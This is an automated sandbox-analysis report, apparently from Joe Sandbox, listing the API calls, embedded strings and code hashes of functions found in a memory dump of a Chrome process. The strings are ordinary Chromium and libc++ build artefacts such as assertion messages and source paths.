                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>$2
                                                    • API String ID: 17069307-716612548
                                                    • Opcode ID: ce4793401275e9a779d94dcaf759326afef337aaf4915ceb30000ce39025df98
                                                    • Instruction ID: 8077e61d22cb3a57d42f3acefdd210f5c058f16b6f8c9ccf97fa2a121d571233
                                                    • Opcode Fuzzy Hash: ce4793401275e9a779d94dcaf759326afef337aaf4915ceb30000ce39025df98
                                                    • Instruction Fuzzy Hash: DF51C1759012098FDB14CF65D480AEEBBF1FF89304F198259E8456B226C736F986CFA0
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00E0491F
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00E0492B
                                                      • Part of subcall function 00E58950: _strlen.LIBCMT ref: 00E58A26
                                                      • Part of subcall function 00E58950: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E58A84
                                                    Strings
                                                    • ..\..\third_party\perfetto\include\perfetto\tracing\track_event_category_registry.h, xrefs: 00E049D7
                                                    • GetHandleVerifier, xrefs: 00E04925
                                                    • PERFETTO_CHECK(false && "A track event used an unknown category. Please add it to " "PERFETTO_DEFINE_CATEGORIES()."), xrefs: 00E049E6
                                                    • %s (errno: %d, %s), xrefs: 00E049EB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\perfetto\include\perfetto\tracing\track_event_category_registry.h$GetHandleVerifier$PERFETTO_CHECK(false && "A track event used an unknown category. Please add it to " "PERFETTO_DEFINE_CATEGORIES().")
                                                    • API String ID: 1366465500-389051806
                                                    • Opcode ID: f55c7b020ee8b630351bfa4a31a375f82ef3cf01870f331d1f87e968a7d4689f
                                                    • Instruction ID: 37799fbf8ae7c937e352fba0f6c665a0ca6fffa2fe9296434dd532c5a3e7aea7
                                                    • Opcode Fuzzy Hash: f55c7b020ee8b630351bfa4a31a375f82ef3cf01870f331d1f87e968a7d4689f
                                                    • Instruction Fuzzy Hash: 0A5165F0A00341AFD718AF20ED45A6677A1EBC5304F145969F645BB3E2EB30AD89C762
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: has duplicate key $ requires KEY=VALUE$, discarding value $..\..\third_party\crashpad\crashpad\handler\handler_main.cc
                                                    • API String ID: 4218353326-3787997346
                                                    • Opcode ID: 551915cc64255ff86f6d0d16a5b55c6186671de7a5419dce33b9d811f1b4b64a
                                                    • Instruction ID: d562c4c20a2fa5100ea2c0d4f1f51f15210d10b6bb4ff7a65090151202255cfe
                                                    • Opcode Fuzzy Hash: 551915cc64255ff86f6d0d16a5b55c6186671de7a5419dce33b9d811f1b4b64a
                                                    • Instruction Fuzzy Hash: 0841D7F1D0432867EB20AB60AC42FEF7778DF51304F0855A5F50937283E6716A898AB2
                                                    APIs
                                                    • SetLastError.KERNEL32(00000057), ref: 00D39EC9
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\base\files\file_win.cc$DoInitialize$ScopedBlockingCall
                                                    • API String ID: 1452528299-1981113363
                                                    • Opcode ID: 7c4afbc43c0c8d89258885f0f7d4a446e60923d8bd632a939fdd9a7ce9adc330
                                                    • Instruction ID: 03b92aee4081552dd8fe83334b61cc0588db171efc86a38a397bf9c61ccb989a
                                                    • Opcode Fuzzy Hash: 7c4afbc43c0c8d89258885f0f7d4a446e60923d8bd632a939fdd9a7ce9adc330
                                                    • Instruction Fuzzy Hash: D55111B1A053419FE710DF28E89271AB7E1EFC9310F048929F8D6A7291D774D909CBA2
                                                    APIs
                                                    • ReplaceFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E1890C
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E18916
                                                    • MoveFileW.KERNEL32(?,?), ref: 00E18930
                                                    Strings
                                                    Similarity
                                                    • API ID: File$ErrorLastMoveReplace
                                                    • String ID: ..\..\base\files\file_util_win.cc$ReplaceFileW$ScopedBlockingCall
                                                    • API String ID: 3435996589-3571703075
                                                    • Opcode ID: fec08199af964524c444c05d0f0e33f1deebbc81affdda7fe154a2afc6ac50e6
                                                    • Instruction ID: e573d1e04063cf3bbfb1799f587a33e14f3d6ec8839eb124834ea7fe4dda588f
                                                    • Opcode Fuzzy Hash: fec08199af964524c444c05d0f0e33f1deebbc81affdda7fe154a2afc6ac50e6
                                                    • Instruction Fuzzy Hash: EC514CB0A003509FD724AF24D8817BA77A4EF95314F44652DF9C9BB242EB70A9C48393
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string:990: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr, xrefs: 00D5FC16
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D5FC1D
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:990: assertion __n == 0 || __s != nullptr failed: basic_string(const char*, n) detected nullptr
                                                    • API String ID: 1452528299-3564941561
                                                    • Opcode ID: 75f392e3b41f8b509f91b872709d4525606cbc5b2957238bf3334fc56f7ead19
                                                    • Instruction ID: d2dfcd2076507b5e19ee2b7cdc34c86077ed2d88489132fe0466b33ecf7071de
                                                    • Opcode Fuzzy Hash: 75f392e3b41f8b509f91b872709d4525606cbc5b2957238bf3334fc56f7ead19
                                                    • Instruction Fuzzy Hash: 614137712003099FCB10AFA5D8C457E77E9EF84326B28453EFC966B381DA31AC498771
                                                    APIs
                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00D33FC9
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D33FE3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D34021
                                                    Strings
                                                    Similarity
                                                    • API ID: CounterExclusiveLockPerformanceQueryReleaseUnothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: @KL
                                                    • API String ID: 1367642695-3812413351
                                                    • Opcode ID: 94c82c57b8c96d1f13037afea1ad19a0b54d1cfe8380d2a04304dc199ff3eb5d
                                                    • Instruction ID: cebaaccbc48b671826cc4a47cb01cd533896aad015766a5a0e53bebe19c15600
                                                    • Opcode Fuzzy Hash: 94c82c57b8c96d1f13037afea1ad19a0b54d1cfe8380d2a04304dc199ff3eb5d
                                                    • Instruction Fuzzy Hash: 65514771A043419FC718CF29D955A2BBBF6FF88300F14892EF595976A1D734E844CB92
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00E7E7C4), ref: 00E7C8CE
                                                    • IsWow64Process.KERNEL32(00000000,?), ref: 00E7C8D6
                                                      • Part of subcall function 00E24D10: VirtualFree.KERNEL32(?,00D9B1C1,00004000,?,65449514,?,00E7E7C4), ref: 00E24DD5
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$CurrentFreeVirtualWow64
                                                    • String ID: $ize$mit$size
                                                    • API String ID: 1078977170-2684755539
                                                    • Opcode ID: 84de9ece455c983eba231f0c7bd3adb1772e25241db7ce5ac41cd46f940f921c
                                                    • Instruction ID: dc0cfcfab1090650e29e2e4f8406ac44e60a377c96a1aac13bdc34ded79b3109
                                                    • Opcode Fuzzy Hash: 84de9ece455c983eba231f0c7bd3adb1772e25241db7ce5ac41cd46f940f921c
                                                    • Instruction Fuzzy Hash: AB41B2B05013009FD7149F25D488A96BBE8EF89318F29C47EE44D9B312E776D905CBA2
                                                    APIs
                                                    • CreateDirectoryW.KERNEL32(00000004,00000000), ref: 00D6E245
                                                    • GetLastError.KERNEL32 ref: 00D6E24F
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D6E354
                                                    • ..\..\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 00D6E2B5
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D6E34D
                                                    • CreateDirectory , xrefs: 00D6E2C7
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID: ..\..\third_party\crashpad\crashpad\client\crash_report_database_win.cc$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateDirectory
                                                    • API String ID: 1375471231-3193998906
                                                    • Opcode ID: 5fa172912ec0b6d15081dfb85e720cde9aee424251246859b8f57161b780e8e1
                                                    • Instruction ID: e4d9e8b9196d7ef336d28bf4d00be9d8a8cbac37784955b1163d02cc04244eae
                                                    • Opcode Fuzzy Hash: 5fa172912ec0b6d15081dfb85e720cde9aee424251246859b8f57161b780e8e1
                                                    • Instruction Fuzzy Hash: 8A313175B003245FDB10AA64EC86F7F77A99F05705F081479F909FB382E761AD488762
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll), ref: 00D4432B
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D4433B
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll), ref: 00D4437B
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D4438B
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressExclusiveLibraryLoadLockProc$AcquireRelease
                                                    • String ID: ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 4021025505-2667675608
                                                    • Opcode ID: 9c45af4afb6ee8d2e096075cb6e06953c3e7a05568f7ebb8db19a66f07019f40
                                                    • Instruction ID: bfaa665077cded2ae579cbaabfaedc3e1372fa733b36a571d4e785370a2c202a
                                                    • Opcode Fuzzy Hash: 9c45af4afb6ee8d2e096075cb6e06953c3e7a05568f7ebb8db19a66f07019f40
                                                    • Instruction Fuzzy Hash: 713129B16807099FC3149F25EC8572673A5EBC4B10F09462DF915BB2A0EB30A885C622
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000), ref: 00DF0DEE
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DF0DFA
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\base\files\file_win.cc$Close$GetHandleVerifier$ScopedBlockingCall
                                                    • API String ID: 1646373207-3663164917
                                                    • Opcode ID: 0d6c60b5543329515dbe9c90c412d09d01b704a17ccfb97247c614b5437367be
                                                    • Instruction ID: b65dd176a36bfcbc0341f4c9e71d3d16f6c367c222f34a31526e2c02bb39facb
                                                    • Opcode Fuzzy Hash: 0d6c60b5543329515dbe9c90c412d09d01b704a17ccfb97247c614b5437367be
                                                    • Instruction Fuzzy Hash: D6310871600348AFD700AF65DC85A7AB7E4FB89300F144D29F6C6AB252E770A948CB72
                                                    APIs
                                                    Strings
                                                    • true, xrefs: 00E72729
                                                    • FeatureList-feature-accessed-too-early, xrefs: 00E727C9
                                                    • FeatureList-early-access-allow-list, xrefs: 00E72809
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E7279B
                                                    • false, xrefs: 00E7272E, 00E72763
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$FeatureList-early-access-allow-list$FeatureList-feature-accessed-too-early$false$true
                                                    • API String ID: 4218353326-219429426
                                                    • Opcode ID: 2343389377b14dabf6bffa2b464a1e6d04414f364a034d3d23f4064885eb22d4
                                                    • Instruction ID: 3681fa4006c1cebc72d110484b5b58b5378db98ae27a2052d77c1d16c17a5402
                                                    • Opcode Fuzzy Hash: 2343389377b14dabf6bffa2b464a1e6d04414f364a034d3d23f4064885eb22d4
                                                    • Instruction Fuzzy Hash: 0D3106F1D002059FCB14EF65ED82ABB77A1EBC5710F15612AE6057B2D1EB312905CAB2
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,FFFFFFFF,00000000,?,00D40EE9,no-periodic-tasks,00000004), ref: 00D4216F
                                                    • CreateEventW.KERNEL32 ref: 00D42204
                                                    • GetLastError.KERNEL32 ref: 00D4221A
                                                    • SetLastError.KERNEL32 ref: 00D4223E
                                                    Strings
                                                    • ExitCodeWatcherThread, xrefs: 00D4219D
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D42277
                                                    Similarity
                                                    • API ID: ErrorLast$CreateCurrentEventProcess
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$ExitCodeWatcherThread
                                                    • API String ID: 2886518480-2863599117
                                                    • Opcode ID: 94505deacf5d584f71c3dd2b2ce1c8597b476f3720e32f208e271c8f92d6f6ab
                                                    • Instruction ID: 1e85f9e2829d7f6cf212057f4ada357a8bab8647ffb4dd262ddbbe970be24ed1
                                                    • Opcode Fuzzy Hash: 94505deacf5d584f71c3dd2b2ce1c8597b476f3720e32f208e271c8f92d6f6ab
                                                    • Instruction Fuzzy Hash: 9C3124709047488FD700EF78D48936EBBF0FF85304F04891EE482AB211DBB4A589CB92
                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00DF5F61,00000000,00000001,?,?,?,?,?,?), ref: 00DF6411
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00DF6423
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DF6443
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DF64A0
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DF64AC
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorLast$AddressCreateEventHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 687412823-1090674830
                                                    • Opcode ID: d69b115bebd7f763320509e5099817479534807e19959d298b0de9ae40dbdc41
                                                    • Instruction ID: 752a942f21b8d11e8016a44a3132b6ea40a3762a5843e4b3e54f60b0a37c5467
                                                    • Opcode Fuzzy Hash: d69b115bebd7f763320509e5099817479534807e19959d298b0de9ae40dbdc41
                                                    • Instruction Fuzzy Hash: ED21B1706043099FD720AF74DC89B3A7BA8FB44300F158829F686EB650E635E848CB71
                                                    APIs
                                                    • GetThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D4154B
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000001), ref: 00D415CE
                                                    • CloseHandle.KERNEL32(?), ref: 00D415D9
                                                    • GetLastError.KERNEL32 ref: 00D415FE
                                                    Strings
                                                    • ..\..\base\threading\platform_thread_win.cc, xrefs: 00D4159C
                                                    • Join, xrefs: 00D415A1
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastObjectSingleThreadWait
                                                    • String ID: ..\..\base\threading\platform_thread_win.cc$Join
                                                    • API String ID: 813778123-1746769387
                                                    • Opcode ID: fcc2959ed826c3194988e714e5402ba3c1077c97dfb9fbea8d7032d62ea954eb
                                                    • Instruction ID: dc7b4aff26f823be74a33f5518be00417de7efc751887f0ce682abb02f8d379a
                                                    • Opcode Fuzzy Hash: fcc2959ed826c3194988e714e5402ba3c1077c97dfb9fbea8d7032d62ea954eb
                                                    • Instruction Fuzzy Hash: 8C2123B49043449FD710AF20DC859AFB7F8EFC6750F040A2DF9D2A7291E770D68886A2
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00E74480,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00D41858
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,00E74480,?,?,?,?,?,?,?,?,?), ref: 00D41878
                                                    • GetCurrentProcess.KERNEL32(?,?,00E74480,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00D41882
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00E74480,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00D418D7
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D418E3
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorLast$AddressCurrentHandleModuleProcProcess
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 2162457882-1090674830
                                                    • Opcode ID: a7ef55b135d5e7ea9f7fcb4139932c0aac2e2a06b6af8ad658279f8097bb9eee
                                                    • Instruction ID: 3959618737b918a915e8cb0ac9d6ab753e57e094d947e64023131886b4aec7e6
                                                    • Opcode Fuzzy Hash: a7ef55b135d5e7ea9f7fcb4139932c0aac2e2a06b6af8ad658279f8097bb9eee
                                                    • Instruction Fuzzy Hash: 3421A778600345AFDB109F65DC89B6A7BF4EB49301F180439F546EB361D7719888CB71
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,00E4418D,E0000008,00E57B4F,?,E0000008,E8226A54,?,00E44018,00000019,AppPolicyGetProcessTerminationMethod,00EC5560,AppPolicyGetProcessTerminationMethod,E0000008), ref: 00E4413F
                                                    Strings
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3664257935-537541572
                                                    • Opcode ID: 7a688da782ad1be40b6d47287851ce6ff4407921054238bddf6bf8b9137d16d7
                                                    • Instruction ID: ff255f8f4bfe774b3ad46a0d763f157de1411f2612dd8087865584ee1695d4a3
                                                    • Opcode Fuzzy Hash: 7a688da782ad1be40b6d47287851ce6ff4407921054238bddf6bf8b9137d16d7
                                                    • Instruction Fuzzy Hash: C4212BB1B02215AFC7229B65BC84F9A37A8AB617A4F251125F912B73C0DB30FD44C6D0
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0CE7C
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,00D6EE40,00000000), ref: 00E0CEBC
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0CF66
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0CF9B
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0D0EF
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,00D6EE40,00000000), ref: 00E0D12B
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID:
                                                    • API String ID: 689400697-0
                                                    • Opcode ID: d7abe9640483ca8049a6ecd72fa1faec0c58290d84741567c5271fcbd7f4c37b
                                                    • Instruction ID: f61df507034f96425f34b2d109698c12936117532e174e6e00b1e54c8c6bc59a
                                                    • Opcode Fuzzy Hash: d7abe9640483ca8049a6ecd72fa1faec0c58290d84741567c5271fcbd7f4c37b
                                                    • Instruction Fuzzy Hash: C2B1E271D043599FDB10CFA4CC49BAEBBB4FB55304F145619E808BB291E7B0A5C4C7A1
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4728101415d44b7fbae8fbd95761aa6f5919ec2f75bfd3bcd3cf7e7bbd80eaed
                                                    • Instruction ID: cc01f55baf298e371e66edd62a5c72a55946c49433fd3097b71b245f94eec3f6
                                                    • Opcode Fuzzy Hash: 4728101415d44b7fbae8fbd95761aa6f5919ec2f75bfd3bcd3cf7e7bbd80eaed
                                                    • Instruction Fuzzy Hash: C6414F756002068FD729DF25C888E26B7F2BF9831171D886CE9969B761E731FC46CB60
                                                    APIs
                                                    • AcquireSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36504
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36536
                                                    • AcquireSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36557
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36567
                                                    • WakeAllConditionVariable.KERNEL32(00EF3718), ref: 00D36572
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF3714), ref: 00D3658E
                                                    Similarity
                                                    • API ID: ExclusiveLock$Release$Acquire$ConditionVariableWake
                                                    • String ID:
                                                    • API String ID: 2445866386-0
                                                    • Opcode ID: f77c9e8ebe76e02bd3ecca0925979f81b4d889079975c5f0ce72ded9a1c25917
                                                    • Instruction ID: 643f3223fb97af9a25a9a1a1a18fa12fccb642255093e0b552382ccf5466fc50
                                                    • Opcode Fuzzy Hash: f77c9e8ebe76e02bd3ecca0925979f81b4d889079975c5f0ce72ded9a1c25917
                                                    • Instruction Fuzzy Hash: 5E21D5B5500349EFCB00AF69DC89A9ABBB0FB45714F04413AF800AB391D3749904CBB2
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D32145
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00D31E30,?,?,00D31FBD,00D31E30,?,?,00D31E30), ref: 00D3214F
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00D31E30,?,?,00D31FBD,00D31E30,?,?,00D31E30), ref: 00D321E4
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D32407
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D32486
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$CurrentReleaseThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 1385397084-2888085009
                                                    • Opcode ID: 5cf43fc63e3667046820ce15e432372279cd5da413130de114c934efaa1f7fcf
                                                    • Instruction ID: 000934980df417f578725c48cd080feccdaec09af7c4c260d0f7d53a01e1c17d
                                                    • Opcode Fuzzy Hash: 5cf43fc63e3667046820ce15e432372279cd5da413130de114c934efaa1f7fcf
                                                    • Instruction Fuzzy Hash: 08C17C75E002059FCB14CF69D880ABABBF5FF59310F188169E84AAB351E730ED55CBA1
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D3C1F5
                                                    • SetThreadPriority.KERNEL32(00000000,00010000), ref: 00D3C207
                                                      • Part of subcall function 00E54320: GetCurrentThread.KERNEL32 ref: 00E54323
                                                      • Part of subcall function 00E54320: GetThreadPriority.KERNEL32(00000000,?,00ED1384,..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds,?,00000000,?,00D3BC66,?,?,?,?,?,?,?,?), ref: 00E5432A
                                                    • SetThreadPriority.KERNEL32(00000000,7FFFFFFF), ref: 00D3C21D
                                                    • GetCurrentThread.KERNEL32 ref: 00D3C23A
                                                    • SetThreadInformation.KERNEL32(00000000,00000003,?,0000000C), ref: 00D3C246
                                                    • SetThreadPriority.KERNEL32(00000000,00020000), ref: 00D3C263
                                                    Similarity
                                                    • API ID: Thread$Priority$Current$Information
                                                    • String ID:
                                                    • API String ID: 2516384554-0
                                                    • Opcode ID: 9896f1d559123edf124816d07b2180067a66e335015285f45189c60a4c1acfc3
                                                    • Instruction ID: a0170cf4f23d8f3b7a661d75ae2e3b76460f6a8f86fdd6b91963d2ba844ad377
                                                    • Opcode Fuzzy Hash: 9896f1d559123edf124816d07b2180067a66e335015285f45189c60a4c1acfc3
                                                    • Instruction Fuzzy Hash: D8012BB5A002045FC7109F75EC58A5F7BF5EF44361F04052DF516BB2D0EB30A5448B55
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D38ECE
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00D38ED9
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D38EEE
                                                    Strings
                                                    • ..\..\base\task\sequence_manager\task_queue_impl.cc, xrefs: 00D38D29
                                                    • PushOntoDelayedIncomingQueue, xrefs: 00D38D2E
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: ..\..\base\task\sequence_manager\task_queue_impl.cc$PushOntoDelayedIncomingQueue
                                                    • API String ID: 1678258262-2027707633
                                                    • Opcode ID: 6b741e861a32e0b844c20bc3c028b250c9f76d5aa7e54b95466ac8e19833284c
                                                    • Instruction ID: 4a099bf2e25e5caa07d42df35499b50d5fe30b7dee04ba2559da8ad0877d5475
                                                    • Opcode Fuzzy Hash: 6b741e861a32e0b844c20bc3c028b250c9f76d5aa7e54b95466ac8e19833284c
                                                    • Instruction Fuzzy Hash: 4791A1B0904B41CFC715CF29D480662BBF0FF99304B15969EE89A9B712E730F995DBA0
                                                    APIs
                                                    • CreateFileW.KERNEL32 ref: 00E9613F
                                                      • Part of subcall function 00E960C0: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000000,00000080,00000000,?,00E96273), ref: 00E960EB
                                                    Strings
                                                    • CreateFile , xrefs: 00E96182, 00E962B0
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E96235, 00E96363
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E9623C, 00E9636A
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00E96170, 00E9629E
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateFile
                                                    • API String ID: 823142352-1749892954
                                                    • Opcode ID: 5f4d3edb59cbae51ec960f18d8667619d669a2013eaf631b4cc014d0272c0a3f
                                                    • Instruction ID: 2113273e987198a00637efea7805eb20218f02300d3d9317853465d2d938730c
                                                    • Opcode Fuzzy Hash: 5f4d3edb59cbae51ec960f18d8667619d669a2013eaf631b4cc014d0272c0a3f
                                                    • Instruction Fuzzy Hash: 3F61D871A003289BDF10EF24DC45FAA77B9AF45714F0451AAF9087B292D7316E48CB92
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D50770
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D507E5
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00ED1384), ref: 00D5086E
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00D5092D
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D50945
                                                    Similarity
